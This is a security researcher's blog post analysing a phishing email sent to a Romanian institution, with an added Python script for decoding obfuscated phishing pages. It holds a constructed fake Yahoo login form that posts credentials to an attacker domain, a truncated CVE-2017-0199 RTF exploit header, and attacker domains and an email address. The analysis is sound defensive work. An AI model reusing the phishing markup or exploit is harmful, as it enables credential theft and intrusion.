Monday 22 January 2018

Nigerian Yahoo phishing mail with JavaScript.

The CEO of an institution sent me an email he had received these days at the institution's email address:
an invoice from an unrelated company.

Hi,
Please send me the order signed and stamped.

Thanks.


He is an old client and knows about cybersecurity, so he did not want to open this suspicious email.
He sent it to me to analyze the file they had received.

So… let’s help our clients! 😉

An obfuscated .htm file with some addresses embedded in it.

When you open the file, a Yahoo page appears telling you that the session has expired and you must log in again.
The login data you enter is then sent to the addresses embedded in the file (shown below).

fademacompany.com.ng & igea.info
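As an added example (not code from the post), here is the kind of small Python triage script I run on such an .htm file: it peels the JavaScript unescape()/atob() layers off the page and reports where the login form actually posts its data. The fake "session expired" markup below is constructed for the example; only the two domains come from the post.

```python
import base64
import html
import re
from urllib.parse import quote, unquote, urlparse

# Constructed sample (not the file from the post): the real markup is hidden in a
# percent-encoded string that JavaScript writes into the page when it is opened.
INNER_HTML = ('<html><title>Yahoo - Session expired</title><body>'
              '<form method="post" action="http://fademacompany.com.ng/login.php">'
              '<input name="user"><input name="pass" type="password"></form>'
              '<img src="http://igea.info/logo.png"></body></html>')
SAMPLE_HTM = "<script>document.write(unescape('%s'));</script>" % quote(INNER_HTML, safe="")

URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
ACTION_RE = re.compile(r"""action\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def js_unescape(s):
    """Mimic JavaScript unescape(): %uXXXX first, then ordinary %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def decode_layers(text, max_rounds=5):
    """Peel common obfuscation layers (unescape(...), atob(...), HTML entities)
    until the text stops changing, so nested encodings are handled as well."""
    for _ in range(max_rounds):
        new = re.sub(r"unescape\(\s*'([^']*)'\s*\)", lambda m: js_unescape(m.group(1)), text)
        new = re.sub(r"atob\(\s*'([^']*)'\s*\)",
                     lambda m: base64.b64decode(m.group(1)).decode("utf-8", "replace"), new)
        new = html.unescape(new)
        if new == text:
            break
        text = new
    return text


def triage(raw_htm, claimed_brand):
    """Report where a suspected phishing page sends its form data; any form action
    whose host does not belong to the impersonated brand is flagged as off-brand."""
    decoded = decode_layers(raw_htm)
    actions = ACTION_RE.findall(decoded)
    hosts = sorted({h for h in (urlparse(u).hostname for u in URL_RE.findall(decoded)) if h})
    off_brand = [a for a in actions if claimed_brand.lower() not in (urlparse(a).hostname or "")]
    return {"impersonates": claimed_brand.lower() in decoded.lower(),
            "form_actions": actions, "contacted_hosts": hosts, "off_brand_actions": off_brand}
```

The hosts it reports are what you then pivot on (WHOIS, hosting, other files on the same domains), exactly as done with the two addresses above.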

They started on 2017-03-14 with DHL phishing.

Both are linked to an email address: onyekaemmanuel158[@]gmail.com

…AND that email address is linked to more domains hosted in Nigeria.

fademacompany.com.ng
igea.info
kikoloe.com
rnsahinet.net
longtirne-lpg.com
eqoteck.com

Some of them show the same message on the main domain, but all of them have files uploaded.

In one of them I found an .rtf exploit uploaded.

Exploit toolkit CVE-2017-0199

{\rt{\object\objautlink\objupdate\rsltpict\objw9579\objh8486\objscalex893748\objscaley4368{\*\objclass \'77\'6F\'72\'64\'2E\'64\'6F\'63\'75\'4D\'65\'4E\'74\'2E\'33\'35\'39\'39\'35\'33}{\*\objdata…

Phishing files are also hosted for LinkedIn, Microsoft, DHL, Google… and more.

In the next picture you can see the relationships between the extracted data.

What I would like to find out is why it was written in Romanian for a Romanian institution, and whether it was something random or a fixed target.
The institution is an important one… so everything is possible.

So this is it!

This was not just an email!

Prodefence.org

Have fun & Stay safe!


Alex Anghelus

Cyber Security, Pentesting & Ethical Hacking Freelancer - Malware Reverse Engineering Researcher
